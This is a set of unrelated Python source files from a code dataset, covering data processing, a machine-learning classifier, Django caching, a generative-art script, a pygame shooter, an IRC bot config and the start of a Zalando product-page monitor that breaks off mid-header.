\"correct\" the dataframe. 
Once fully described its far more \nefficient to flatten (1000's of cells per operation rather than 1000's of individual operations)\n\n\"\"\"\n\nfrom databaker.framework import *\nimport pandas as pd\nfrom collections import OrderedDict\n\n\n\n# Codes for where we just have a place name\n# The presence of \"England\" in \"England and Wales\" can cause replacment confusion so using two passes\ncodeNames = OrderedDict({\n \"United Kingdom\":\"K02000001\",\n \"Great Britain\":\"K03000001\",\n \"England and Wales\":\"K04000001\",\n \"Wales / Cymru\":\"W92000004\",\n \"Northern Ireland\":\"N92000002\",\n \"Scotland\":\"S92000003\",\n \"North East\":\"E12000001\",\n \"North West\":\"E12000002\",\n \"Yorkshire and The Humber\":\"E12000003\",\n \"East Midlands\":\"E12000004\",\n \"West Midlands\":\"E12000005\",\n \"London\":\"E12000007\",\n \"South East\":\"E12000008\",\n \"South West\":\"E12000009\"\n })\n\nsmallCodes = OrderedDict({\n \"East\":\"E12000006\",\n \"England\":\"E92000001\",\n })\n\n# probably easier to derive but this keeps the code simpler\n# also, can compare tabs to this for validation\nfindGenderWork = {\n 'All':{'gender':'All', 'work':'All'},\n 'Male':{'gender':'Male', 'work':'All'},\n 'Female':{'gender':'Female', 'work':'All'},\n 'Full-Time':{'gender':'All', 'work':'Full-Time'},\n 'Part-Time':{'gender':'All', 'work':'Part-Time'},\n 'Male Full-Time':{'gender':'Male', 'work':'Full-Time'},\n 'Male Part-Time':{'gender':'Male', 'work':'Part-Time'},\n 'Female Full-Time':{'gender':'Female', 'work':'Full-Time'},\n 'Female Part-Time':{'gender':'Female', 'work':'Part-Time'}\n}\n\nheaders = [\n 'delete1',\n 'Geography',\n 'Number of Jobs (thousands)',\n 'Median',\n 'Annual Percentage Change',\n 'Mean',\n 'Annual Percentage change',\n '10', '20', '25', '30', '40', '60', '70', '75', '80', '90',\n 'drop1', 'drop2', 'drop3'\n]\n\n\n# functions\n\n\n# the number of column headers bring picked up can vary slightly over time\n# nothing serious but + or - 1 junk column does happen. 
Need to accomdate it\ndef tryHeaders(df, headers):\n\n if len(df.columns.values) < len(headers):\n headers = headers[:-1]\n \n if len(df.columns.values) > len(headers):\n headers.append('dopr4')\n\n return headers\n\n \n \n# get the uqiue descriptor of this spreadsheet\n# i.e ' Get 'Working Pay - Gross' out of the filename 'Work Geography Table 7.1a Weekly pay - Gross 2013.csv' \ndef unique_me(filename):\n filenames = filename.split('.')\n del filenames[0]\n filenames = filenames[0]\n filenames = filenames[3:-5]\n filenames = filenames.strip()\n return filenames\n\n\n# take a clean dataframe of observations and another of CVs and build a v3 output\ndef makeV4(cvDf, df):\n\n obs_file_parts = []\n wanted = [ '10', '20', '25', '30', '40', '60', '70', '75', '80', '90']\n wanted.append('Mean')\n wanted.append('Median')\n \n # get rid of headers\n df = df[4:]\n \n for col in wanted:\n newDf = pd.DataFrame()\n newDf['V4_2'] = df[col]\n newDf['Data_Marking'] = ''\n newDf['CV'] = cvDf[col]\n \n newDf['Time_codelist'] = 'Year'\n newDf['Time'] = df['Time']\n \n newDf['Geography_codelist'] = df['Geography']\n newDf['Geography'] = ''\n \n newDf['Earnings_codelist'] = ''\n newDf['Earnings'] = df['Earnings']\n \n newDf['Gender_codelist'] = ''\n newDf['Gender'] = df['Gender']\n \n newDf['Working Pattern_codelist'] = ''\n newDf['Working Pattern'] = df['Working Pattern']\n \n newDf['Earnings Statistics_codelist'] = ''\n newDf['Earnings Statistics'] = col\n\n obs_file_parts.append(newDf)\n \n obs_file = pd.concat(obs_file_parts)\n obs_file.fillna('', inplace=True)\n \n # remove any blank obs (data makers and obs are still in one column at this point)\n obs_file = obs_file[obs_file['V4_2'].astype(str) != '']\n \n # split obs and data markers\n dMarkers = ['x', '..', ':', '-']\n obs_file['Data_Marking'][obs_file['V4_2'].map(lambda x: x in dMarkers)] = obs_file['V4_2']\n obs_file['V4_2'][obs_file['V4_2'].map(lambda x: x in dMarkers)] = ''\n \n return obs_file\n \n \nimport requests, zipfile, io, sys\n\nz = zipfile.ZipFile(sys.argv[1])\nallFiles = z.namelist()\n\n# get the non cv files for the datasets\nnonCvFiles = [x for x in allFiles if 'CV.' not in x and '.12' not in x and '.13' not in x] # added 12 and 13 as they're getting creative\nhoursFiles = [x for x in nonCvFiles if '.9' in x or '.10' in x or '.11' in x]\nearningsFiles = [x for x in nonCvFiles if '.9' not in x and '.10' not in x and '.11' not in x]\n\n \n \nhoursRun=True\nfor dset in [hoursFiles, earningsFiles]:\n \n doneTabs = []\n for ncf in dset:\n\n # load into databaker\n xl = pd.ExcelFile(z.open(ncf))\n tabs = xl.sheet_names\n\n # clip the year out of the name (last 4 letters not counting the file extension)\n time = ncf.split(' ')[-1][:-4]\n\n for tab in tabs:\n\n if 'notes' not in tab.lower():\n\n # load the current tab into a dataframe\n df = xl.parse(tab)\n \n # headers +/- 1 (some inconsistencies over time)\n df.columns = tryHeaders(df, headers)\n\n # get rid of footer and below\n footer = df[df['delete1'] == 'Not Classified']\n assert len(footer) == 1, \"Cannot find 'Not Classified'. 
Unable to find end of data table\"\n footY = footer.index[0] # its a tuple-like object (int, type)\n df = df[:footY]\n \n df.fillna('', inplace=True) # get rid of the nans\n\n # Add gender and working pattern\n df['Gender'] = findGenderWork[tab]['gender']\n df['Working Pattern'] = findGenderWork[tab]['work']\n\n # iterate rows\n # TODO = kinda slow\n df['Geography'][df['Geography'] == ''] = df['delete1']\n for code in codeNames.keys():\n df['Geography'] = df['Geography'].map(lambda x: x.replace(code, codeNames[code]))\n \n for code in smallCodes.keys():\n df['Geography'] = df['Geography'].map(lambda x: x.replace(code, smallCodes[code]))\n\n\n # add the time\n df['Time'] = time\n\n # get hours worked\n hoursOrEarnings = unique_me(ncf)\n df['Earnings'] = hoursOrEarnings\n\n \"\"\"\n Use the Special Phrase(i.e \"Weekly Pay Gross\") to split to the table number\n use that to load the CV version of the table\n \"\"\"\n Cvfile = ncf.split(hoursOrEarnings)[0]\n replaceText = Cvfile.split(' ')[-4]\n Cvfile = ncf.replace(replaceText, replaceText.replace('a', 'b'))\n Cvfile = Cvfile.replace('.x', ' CV.x')\n\n # load Cv excel\n xl2 = pd.ExcelFile(z.open(Cvfile))\n cvDf = xl2.parse(tab)\n cvDf = cvDf[4:footer.index[0]]\n cvDf.columns = tryHeaders(cvDf, headers)\n\n\n olDf = df\n\n df = makeV4(cvDf, df)\n\n doneTabs.append(df)\n\n df = pd.concat(doneTabs)\n\n if hoursRun:\n ds = 'Hours'\n hoursRun = False\n else:\n ds = 'Earnings'\n \n if 'provisional' in sys.argv[1].lower():\n prov = '_Provisional_'\n else:\n prov = ''\n \n df.to_csv('ASHE_7_{ds}{p}{t}.csv'.format(ds=ds, t=time, p=prov), encoding=\"utf-8\", index=False)\n","sub_path":"ASHE Table 7/ASHE7.py","file_name":"ASHE7.py","file_ext":"py","file_size_in_byte":8268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459609723","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 12:33:09 2018\n\n@author: raghebal-ghezi\n\"\"\"\nimport itertools\nimport numpy as np\nimport pandas as pd\nfrom sklearn import linear_model\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\n\n\n#pickled Pandas DataFrame that has the following cols:\n# ['candid', 'const_tags', 'constituents', 'cosine_2', \n# 'cosine_3', 'left_span', 'question', 'right_span', \n# 'span_length', 'text', 'wh+tag', 'target', 'tfidf_sum', \n# 'tfidf_sum_2', 'tfidf_sum_3', 'glove_cos_2']\ndf = pd.read_pickle('serialized_df.pkl')\n\n\ndf_feature = pd.DataFrame() #to store the features\n#try:\nprint(\"Generating features ...... (1 of 5)\")\nfor i,j in enumerate(df.cosine_2): # prepare features for Contextual Overlap with window size 2\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_cos2_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (2 of 5)\")\nfor i,j in enumerate(df.cosine_3): # prepare features for Contextual Overlap with window size 3\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_cos3_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (3 of 5)\") \nfor i,j in enumerate(df.tfidf_sum_2):# sum of tfidf values for Contextual Overlap with window size 2\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_tfidf2_\"+\"%s\"%k] = l\nprint(\"Generating features ...... 
(4 of 5)\") \nfor i,j in enumerate(df.tfidf_sum_3): # sum of tfidf values for Contextual Overlap with window size 3\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_tfidf3_\"+\"%s\"%k] = l\nprint(\"Generating features ...... (5 of 5)\")\nfor i,j in enumerate(df.glove_cos_2): # distributional cos sim\n for k,l in enumerate(j):\n if k < 31:\n df_feature.loc[i, \"column_gloveCos_\"+\"%s\"%k] = l\n\n# Appending the remaining features from original dataframe\ndf_feature['wh+tag'] = df['wh+tag'] \ndf_feature['left_span'] = df['left_span']\ndf_feature['right_span'] = df['right_span']\ndf_feature['span_length'] = df['span_length']\ndf_feature['target'] = df.target\n\n# restricting the number of target constituents to 30\ntrain_final = df_feature[df_feature['target'] < 31]\n\n# filling in missing values with zeros\ntrain_final = train_final.fillna(0)\n\n# enforcing the datatype to 'wh+tag' \ntrain_final['wh+tag'] = train_final['wh+tag'].map(lambda x:str(x).lower())\n#fixing the indices of dataframe\ntrain_final = train_final.reset_index(drop=True)\n\n# encoding the 'wh+tag' to numerical values\nle = preprocessing.LabelEncoder()\ntrain_final['wh+tag'] = le.fit_transform(train_final['wh+tag'])\n\n# assigning X and y\nX = train_final.drop('target',axis=1)\ny = train_final['target']\n\n# splitting and Shuffling\ntrain_x, test_x, train_y, test_y = train_test_split(X,y, train_size=0.7, random_state = 5,shuffle=True)\n# Using LR with Newton methods optimizer\nmul_lr = linear_model.LogisticRegression(random_state=0, solver='newton-cg',multi_class='multinomial',n_jobs=-1)\nmul_lr.fit(train_x, train_y)\n\n# Printing Classification Report\nprint(classification_report(test_y, mul_lr.predict(test_x), labels=np.unique(mul_lr.predict(test_x))))\n\n\ndef plot_confusion_matrix(cm, classes,\n normalize=False,\n title='Confusion matrix',\n cmap=plt.cm.Blues):\n \"\"\"\n This function prints and plots the confusion matrix.\n Normalization can be applied by setting `normalize=True`.\n \"\"\"\n if normalize:\n cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]\n print(\"Normalized confusion matrix\")\n else:\n print('Confusion matrix, without normalization')\n\n print(cm)\n\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n plt.colorbar()\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = '.2f' if normalize else 'd'\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(j, i, format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\", fontsize=2)\n\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n plt.savefig('fig_1.pdf')\n\n\n# Compute confusion matrix\ncnf_matrix = confusion_matrix(test_y, mul_lr.predict(test_x), labels=[i for i in range(0,30)])\nnp.set_printoptions(precision=2)\n\n# Plot normalized confusion matrix\nplt.figure()\nplot_confusion_matrix(cnf_matrix, classes=np.unique(mul_lr.predict(test_x)),\n title='Confusion matrix, with normalization', normalize=True)","sub_path":"squad2_hw4.py","file_name":"squad2_hw4.py","file_ext":"py","file_size_in_byte":4887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"247616802","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Author : LEITENG\n@Version : \n------------------------------------\n@File : p23_GD2_sqrt.py\n@Description : \n@CreateTime : 2020/6/9 
17:16\n------------------------------------\n@ModifyTime : GD2\n\"\"\"\n\n\ndef sqrt(n, lr=0.001, epoches=2000):\n y = lambda x: x**2\n # loss = lambda x: (y(x) - n)**2\n dloss_x = lambda x: 2*(y(x) - n) * 2 * x\n dx = lambda x, lr: -lr * dloss_x(x)\n\n x = 1\n for _ in range(epoches):\n x += dx(x, lr)\n return x\n\n\ndef main():\n for i in range(11):\n print('sqrt(%s) = %f' % (i, sqrt(i)))\n\n\nif __name__ == '__main__':\n main()","sub_path":"deeplearning_tensorflow_p/p23_GD2_sqrt.py","file_name":"p23_GD2_sqrt.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"37622049","text":"import inspect\nimport hashlib\nimport cPickle as pickle\nfrom django.db.models.query import QuerySet\nfrom functools import wraps\nfrom avocado.conf import settings\nfrom .proxy import CacheProxy\n\nNEVER_EXPIRE = 60 * 60 * 24 * 30 # 30 days\nCACHE_KEY_FUNC = lambda l: ':'.join([str(x) for x in l])\n\n\ndef _pickling_value(v):\n \"Returns value for pickling given the value.\"\n if isinstance(v, QuerySet):\n return v.query\n\n return v\n\n\ndef _prep_pickling(args, kwargs):\n \"Prepares the positional and keyword arguments for pickling.\"\n if args:\n args = [_pickling_value(v) for v in args]\n else:\n args = None\n\n _kwargs = {}\n\n if kwargs:\n for k, v in kwargs.items():\n if v is not None:\n _kwargs[k] = _pickling_value(v)\n\n kwargs = _kwargs or None\n else:\n kwargs = None\n\n return args, kwargs\n\n\ndef instance_cache_key(instance, label=None, version=None,\n args=None, kwargs=None):\n \"\"\"Creates a cache key for the instance with an optional label and version.\n The instance is uniquely defined based on the app, model and primary key of\n the instance.\n\n A `label` is used to differentiate cache for an instance.\n\n The `version` can be a scalar (i.e. a string or int), a function, instance\n property or method.\n \"\"\"\n if version is None:\n version = '-'\n elif callable(version):\n version = version(instance, label=label)\n elif hasattr(instance, version):\n version = getattr(instance, version)\n if callable(version):\n version = version()\n\n opts = instance._meta\n key = [opts.app_label, opts.module_name, instance.pk, version]\n\n if label is not None:\n key.append(label)\n\n args, kwargs = _prep_pickling(args, kwargs)\n\n if args or kwargs:\n sha1 = hashlib.sha1(pickle.dumps((args, kwargs))).hexdigest()\n key.append(sha1)\n\n return CACHE_KEY_FUNC(key)\n\n\ndef cached_method(func=None, version=None, timeout=NEVER_EXPIRE,\n key_func=instance_cache_key):\n \"Wraps a method and caches the output indefinitely.\"\n\n def decorator(func):\n # Single cache proxy shared across all instances. All methods require\n # the instance to be passed.\n cache_proxy = CacheProxy(func, version, timeout, key_func)\n\n @wraps(func)\n def inner(self, *args, **kwargs):\n # This check is here to be ensure transparency of the augmented\n # methods below. 
The agumented methods will be a no-op since the\n # `func_self` will never be set as long as this condition is true.\n if not settings.DATA_CACHE_ENABLED:\n return func(self, *args, **kwargs)\n\n return cache_proxy.get_or_set(self, args=args, kwargs=kwargs)\n\n def flush(instance, args=None, kwargs=None):\n return cache_proxy.flush(instance, args, kwargs)\n\n def cached(instance, args=None, kwargs=None):\n return cache_proxy.cached(instance, args, kwargs)\n\n def cache_key(instance, args=None, kwargs=None):\n return cache_proxy.cache_key(instance, args, kwargs)\n\n inner.flush = flush\n inner.cached = cached\n inner.cache_key = cache_key\n\n return inner\n\n if inspect.isfunction(func):\n return decorator(func)\n return decorator\n","sub_path":"charlies_revenge/lib/python2.7/site-packages/avocado/core/cache/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"408884380","text":"\"\"\" \nToolbox4: Revise MiniProject2\n# created on Thu Dec 10 21:48 2015\n# @author: YeongHwa Kim\n\nI revised \"build_random_function\" and \"evaluate_random_function\".\n\"\"\"\nimport random \nfrom PIL import Image\nimport math\n\n# Definition for the calculating unit functions\n# Input and Output: numbers(float)\ndef prod(a, b):\n\treturn float(ab)\ndef cos_pi(a):\n\treturn float(math.cos(math.pi*a))\ndef sin_pi(a):\n\treturn float(math.sin(math.pi*a))\ndef X(a, b):\n\treturn float(a)\ndef Y(a, b):\n\treturn float(b)\n\n# Definition for random function building function\n# Input: the possible range of the depth for function(int)\n# Output: the list of functions(list)\ndef build_random_function(min_depth, max_depth):\n\tdep = random.randint(min_depth, max_depth)\n\t\t\n\tunit = [[\"x\"], [\"y\"]]\n\tbuilding_block = [[\"prod\", [\"a\"], [\"b\"]], [\"cos_pi\", [\"a\"]], [\"sin_pi\", [\"a\"]]]\n\n\tif dep == 1:\n\t\treturn random.choice(unit)\n\telse:\n\t\toutlist = random.choice(building_block)\n\t\tif outlist[0] == \"cos_pi\" or outlist[0] == \"sin_pi\" :\n\t\t\tdep = dep -1\n\t\t\toutlist[1] = build_random_function(1, dep)\n\t\t\treturn outlist\n\t\telse:\n\t\t\tdep = dep - 1\n\t\t\toutlist[1] = build_random_function(1, dep)\n\t\t\toutlist[2] = build_random_function(1, dep)\n\t\t\treturn outlist\n\n# Definition for evaluating function\n# Input1: list of functions which wants to calculate(list)\n# Input2: input value for x(float)\n# Input3: input value for y(float) \n# Output: mathematically calculated value(float)\ndef evaluate_random_function(random_function, x, y):\n\touter_function = random_function\n\tlength = len(random_function)\n\tif length == 1:\n\t\tif outer_function[0] == \"x\":\n\t\t\treturn X(x, y)\n\t\telif outer_function[0] == \"y\":\n\t\t\treturn Y(x, y)\n\n\telse:\n\t\tif outer_function[0] == \"cos_pi\":\n\t\t\tinner_function = outer_function[1]\n\t\t\treturn cos_pi(evaluate_random_function(inner_function, x, y))\n\t\t\t\n\t\tif outer_function[0] == \"sin_pi\":\n\t\t\tinner_function = outer_function[1]\n\t\t\treturn sin_pi(evaluate_random_function(inner_function, x, y))\n\t\t\t\n\t\tif random_function[0] == \"prod\": \n\t\t\tinner_function1 = outer_function[1]\n\t\t\tinner_function2 = outer_function[2]\n\t\t\ta = evaluate_random_function(inner_function1, x, y)\n\t\t\tb = evaluate_random_function(inner_function2, x, y)\n\t\t\treturn a*b\n\n# Definition for interval remapping function\n# Input1: the value that want to remap in different interval(float)\n# Input2: the value 
that initial interval starts(float)\n# Input3: the value that initial interval ends(float)\n# Input4: the value that changed interval starts(float)\n# Input5: the value that changed interval ends(float)\n# Output: remapped \"val\"\ndef remap_interval(val, input_interval_start, input_interval_end, output_interval_start, ouput_interval_end):\n\ta = float(output_interval_start)\n\tb = float(val - input_interval_start)\n\tc = float(ouput_interval_end - output_interval_start)\n\td = float(input_interval_end - input_interval_start)\n\tlol = a+b*c/d\n\treturn lol\n\n\n# Making RGB value\n\n# Make random function for the R, G, B values\nfuncR = build_random_function(1, 8)\nfuncG = build_random_function(2, 4)\nfuncB = build_random_function(5, 9)\n\n# lists of x, y values in range from -1 to 1\nx_values = []\nfor i in range(350):\n\ta = remap_interval(i, 0, 350, -1, 1)\n\tx_values.append(a)\n\ny_values = []\nfor i in range(350):\n\ta = remap_interval(i, 0, 350, -1, 1)\n\ty_values.append(a)\n\n# Definition of function that calculate the RGB values\n# Input: the x, y coordinates(int)\n# Output: RGB value(tuple)\ndef extractRGB(i, j):\n\tR = evaluate_random_function(funcR, x_values[i], y_values[j])\n\tR = int(remap_interval(R, -1, 1, 0, 255))\n\tG = evaluate_random_function(funcG, x_values[i], y_values[j])\n\tG = int(remap_interval(G, -1, 1, 0, 255))\n\tB = evaluate_random_function(funcB, x_values[i], y_values[j])\n\tB = int(remap_interval(B, -1, 1, 0, 255))\n\treturn R, G, B\n\n# Make the image\nim = Image.new(\"RGB\", (350, 350))\nfor i in range(350):\n\tfor j in range(350):\n\t\tim.putpixel((i, j),extractRGB(i, j))\nim.save('openplease.png')","sub_path":"toolbox/MP2_revise.py","file_name":"MP2_revise.py","file_ext":"py","file_size_in_byte":3910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"549880731","text":"\"\"\"empty message\n\nRevision ID: da480f231142\nRevises: 0e0a38cb41aa\nCreate Date: 2019-03-21 10:24:09.610576\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'da480f231142'\ndown_revision = '4f3e25700ad5'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('timezone',\n sa.Column('timezone_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('timezone_name', sa.String(length=256), nullable=False),\n sa.PrimaryKeyConstraint('timezone_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('timezone')\n # ### end Alembic commands ###\n","sub_path":"api/migrations/versions/da480f231142_.py","file_name":"da480f231142_.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"77831229","text":"import pygame\nimport random\nimport re\nfrom main import *\n\n# 屏幕大小\nSCREEN_RECT = pygame.Rect(0, 0, 480, 700)\n# 刷新帧率\nFRAME_PER_SEC = 60\n# 创建敌机的定时器常量\nCREATE_ENEMY_EVENT = pygame.USEREVENT\n# 发射子弹定时器\nHERO_FIRE_EVENT = pygame.USEREVENT + 1\n\n\nclass GameSprite(pygame.sprite.Sprite):\n \"\"\"飞机大战游戏精灵\"\"\"\n\n def __init__(self, image_name, speed=1):\n # 调用父类的初始化方法\n super().__init__()\n\n # 定义对象的属性\n self.image = pygame.image.load(image_name)\n self.rect = self.image.get_rect()\n self.speed = speed\n\n def update(self):\n # 在屏幕的垂直方向上移动\n self.rect.y += self.speed\n # if self.rect.y > 700:\n # self.rect.y = -42\n\n\nclass Background(GameSprite):\n \"\"\"背景精灵\"\"\"\n\n def __init__(self, is_alt=False):\n # 调用父类方法\n super().__init__(\"../images/background.png\")\n # 判断是否是��替图像,并设置初始位置\n if is_alt:\n self.rect.y = -self.rect.height\n\n def update(self):\n # 调用父类方法实现\n super().update()\n # 判断是否移出屏幕,并更新位置\n if self.rect.y >= SCREEN_RECT.height:\n self.rect.y = -self.rect.height\n\n\nclass Enemy(GameSprite):\n def __init__(self, enemy_type, speed, hp):\n # 调用父类\n super().__init__(enemy_type, speed)\n # 敌机速度\n # self.speed = random.randint(1, 3)\n\n self.enemy_type = int(re.search(r\"enemy(\\d)\", enemy_type).group(1))\n\n # 敌机位置\n self.rect.bottom = 0\n max_x = SCREEN_RECT.width - self.rect.width\n self.rect.x = random.randint(0, max_x)\n self.HP = hp\n\n self.boom_image_list0 = []\n self.boom_image_list1 = []\n self.boom_image_list2 = []\n self.boom_image_index = 1\n self.__get_boom_image()\n self.isboom = False\n self.time = 0\n\n def update(self):\n # 调用父类\n super().update()\n # 敌机飞出并删除\n if self.rect.y >= SCREEN_RECT.height:\n self.kill()\n # self.__del__()\n # self.isboom = True\n # 判断敌机血量\n if self.HP <= 0:\n self.speed = 0\n self.isboom = True\n\n def boom(self, screen):\n x = [(self.boom_image_list0, self.boom_image_length0),\n (self.boom_image_list1, self.boom_image_length1),\n (self.boom_image_list2, self.boom_image_length2)]\n\n # if self.boom_image_index == x[self.enemy_type - 1][1]:\n # return 1\n\n boom_image = x[self.enemy_type-1][0][self.boom_image_index-1]\n screen.blit(boom_image, (self.rect.x, self.rect.y))\n if self.time > 15:\n self.boom_image_index += 1\n self.time -= 15\n if self.boom_image_index-1 == x[self.enemy_type-1][1]:\n return 1\n else:\n self.time += 1\n\n def __get_boom_image(self):\n for i in range(1, 5):\n self.boom_image_list0.append(\n pygame.image.load(\"../images/enemy1_down\" + str(i) + \".png\"))\n self.boom_image_list1.append(\n pygame.image.load(\"../images/enemy2_down\" + str(i) + \".png\"))\n for i in range(1, 7):\n self.boom_image_list2.append(\n pygame.image.load(\"../images/enemy3_down\" + str(i) + \".png\"))\n self.boom_image_length0 = len(self.boom_image_list0)\n self.boom_image_length1 = len(self.boom_image_list1)\n self.boom_image_length2 = len(self.boom_image_list2)\n\n def __del__(self):\n pass\n\n\nclass Hero(GameSprite):\n \"\"\"英雄精灵\"\"\"\n\n def __init__(self):\n super().__init__(\"../images/me1.png\", speed=0)\n self.rect.centerx = SCREEN_RECT.centerx\n self.rect.bottom = SCREEN_RECT.height - 100\n\n # 创建子弹精灵组\n self.bullets = pygame.sprite.Group()\n self.bullet = Bullet()\n self.boom_image_list = []\n 
self.boom_image_index = 1\n self.__get_boom_images()\n self.isboom = False\n self.time = 0\n\n def update(self):\n # 水平移动\n self.rect.x += self.speed\n if self.rect.left < -3:\n self.rect.left = -3\n elif self.rect.right > SCREEN_RECT.right + 3:\n self.rect.right = SCREEN_RECT.right + 3\n\n def fire(self):\n if self.isboom:\n return\n # 创建子弹精灵\n bullet = Bullet()\n # 设置精灵的位置\n bullet.rect.bottom = self.rect.y + 5\n bullet.rect.centerx = self.rect.centerx\n # 降精灵添加到精灵组\n self.bullets.add(bullet)\n\n def boom(self, screen):\n boom_image = self.boom_image_list[self.boom_image_index - 1]\n screen.blit(boom_image, (self.rect.x, self.rect.y))\n if self.time > 15:\n self.boom_image_index += 1\n self.time -= 15\n if self.boom_image_index-1 == self.boom_image_length:\n return 1\n else:\n self.time += 1\n\n def __get_boom_images(self):\n for i in range(1, 5):\n self.boom_image_list.append(\n pygame.image.load(\"../images/me_destroy_\" + str(i) + \".png\"))\n self.boom_image_length = len(self.boom_image_list)\n\n\nclass Bullet(GameSprite):\n \"\"\"子弹精灵\"\"\"\n\n def __init__(self):\n super().__init__(\"../images/bullet1.png\", speed=-2)\n\n def update(self):\n # 调用父类,垂直飞行\n super().update()\n # 是否飞出屏幕\n self.rect.y += self.speed\n if self.rect.bottom < 0:\n self.kill()\n\n def __del__(self):\n pass\n","sub_path":"2.0/plane_sprites.py","file_name":"plane_sprites.py","file_ext":"py","file_size_in_byte":5743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"244324379","text":"import os\nfrom UserDict import IterableUserDict\n\nimport yaml\n\n\ndef recursive_dict_update(d, u):\n \"\"\"http://stackoverflow.com/a/3233356/148585\"\"\"\n for k, v in u.iteritems():\n if isinstance(v, dict):\n r = recursive_dict_update(d.get(k, {}), v)\n d[k] = r\n else:\n d[k] = u[k]\n return d\n\n\nclass Settings(IterableUserDict):\n def __init__(self, path):\n self.path = path\n self.data = {}\n\n self._load_defaults()\n self._load_file(self.path)\n\n def _load_file(self, path):\n if not os.path.exists(path):\n return False\n with open(path) as fp:\n recursive_dict_update(self.data, yaml.safe_load(fp))\n return True\n\n def _load_defaults(self):\n self.data = yaml.safe_load('''\n channels:\n - '#sourcemod'\n - '#yakbot'\n network:\n host: irc.gamesurge.net\n port: 6667\n nickname: yakbot\n plugins:\n - smapi\n - smbugs\n - smplugins\n - steamid\n - zachbraffquotes\n reply-with-name: true\n ''')\n\n def _save_to_file(self, path):\n with open(path, 'w') as fp:\n fp.write(yaml.safe_dump(self.data, default_flow_style=False))\n\n def flush(self):\n self._save_to_file(self.path)\n\n def __setitem__(self, key, value):\n IterableUserDict.__setitem__(self, key, value)\n self.flush()\n\n def update(self, dict=None, **kwargs):\n IterableUserDict.update(self, dict, **kwargs)\n self.flush()\n","sub_path":"yakbot/conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"526771918","text":"import doctest\n\n\ndef solve(num):\n \"\"\"\n >>> solve(123)\n 27\n >>> solve(13)\n 7\n >>> solve(0)\n 0\n \"\"\"\n decimal = 0\n strnum = str(num)\n pow = len(strnum) - 1\n for i in range(len(strnum)):\n decimal += int(strnum[i]) * (4 ** pow)\n pow -= 1\n return decimal\n\n\nif __name__ == '__main__':\n doctest.testmod()\n 
print(solve(int(input())))\n","sub_path":"2016_summer/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"440337936","text":"#!/usr/bin/env python3\nimport json\nfrom json.decoder import JSONDecoder\nimport requests\nfrom bs4 import BeautifulSoup\nfrom os import link\nfrom random_user_agent.params import SoftwareName, HardwareType\nfrom random_user_agent.user_agent import UserAgent\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\nfrom urllib.parse import urlunsplit, urlencode\nimport requests as rq\nimport time\nimport json\nimport logging\nimport dotenv\nimport urllib3\nfrom datetime import datetime, timedelta\nfrom requests_html import HTMLSession\n\n\n\"\"\"\nlogs\n\"\"\"\nlogging.basicConfig(filename='MonitoLog.log', filemode='a', format='%(asctime)s - %(name)s - %(message)s',\n level=logging.DEBUG)\n\"\"\"\nconfigurations\n\"\"\"\nhardware_type = [HardwareType.MOBILE__PHONE]\nsoftware_names = [SoftwareName.CHROME.value]\n\nuser_agent_rotator = UserAgent(software_names=software_names, hardware_type=hardware_type)\nCONFIG = dotenv.dotenv_values()\n\nurl=\"https://www.zalando.fr/nike-sportswear-dunk-baskets-basses-yellow-strikewhite-ni111a0y9-e11.html\"\ncontentstring = \"le contenu attendu\"\n\nheaders = {\n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Accept-Language\": \"en-GB,en-US;q=0.9,en;q=0.8\", \n\"Dnt\": \"1\", \n\"Host\": \"www.zalando.fr\", \n\"Upgrade-Insecure-Requests\": \"1\", \n\"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like 